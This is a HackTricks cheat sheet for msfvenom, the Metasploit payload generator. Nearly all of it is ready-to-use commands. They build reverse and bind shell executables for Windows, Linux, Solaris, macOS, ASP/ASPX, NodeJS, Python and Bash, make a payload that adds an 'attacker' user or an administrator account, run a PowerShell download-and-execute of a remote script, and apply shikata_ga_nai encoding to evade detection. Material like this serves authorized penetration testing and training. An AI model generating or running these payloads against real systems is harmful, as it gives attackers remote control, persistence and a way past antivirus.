MSFVenom - CheatSheet - HackTricks
MSFVenom - CheatSheet - HackTricks
Listing
msfvenom -l payloads #Payloads
msfvenom -l encoders #Encoders
Windows
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f exe > reverse.exe
Bind Shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your
Port) -f exe > bind.exe
Create User
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe >
adduser.exe
CMD Shell
msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -
f exe > prompt.exe
Execute Command
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell
\"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -
f exe > pay.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup
administrators shaun /add" -f exe > pay.exe
Encoder
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe >
encoded.exe
Linux Payloads
Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf >
shell.elf
Bind Shell
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your
Port) -f elf > bind.elf
SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=
(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' >
solshell.elf
MAC Payloads
Reverse Shell:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -
f macho > reverse.macho
Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f
macho > bind.macho
ASP/x
Reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f asp >reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your
Port) -f aspx >reverse.aspx
JSP
Reverse shell
WAR
Reverse Shell
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
Python
msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f
raw > reverse.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local
Port> -f raw > shell.sh
Join HackenProof Discord server to communicate with experienced hackers and bug
bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert
(ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert
(GRTE)
Support HackTricks
Previous
Reverse Shells (Linux, Windows, MSFVenom)
Next
Reverse Shells - Windows